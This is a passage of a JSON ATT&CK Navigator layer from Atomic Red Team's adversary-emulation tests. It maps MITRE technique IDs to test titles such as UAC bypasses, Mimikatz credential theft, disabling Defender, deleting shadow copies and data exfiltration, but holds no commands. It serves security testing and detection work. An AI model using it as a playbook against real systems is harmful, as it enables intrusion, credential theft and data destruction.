Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with Sysinternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":9,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":1,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":4,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":36,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":1,"enabled":true,"comment":"\n- Modify SSP configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":29,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n"},{"techniqueID":"T1564.001","score":3,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"comment":"\n- Hidden Window\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View 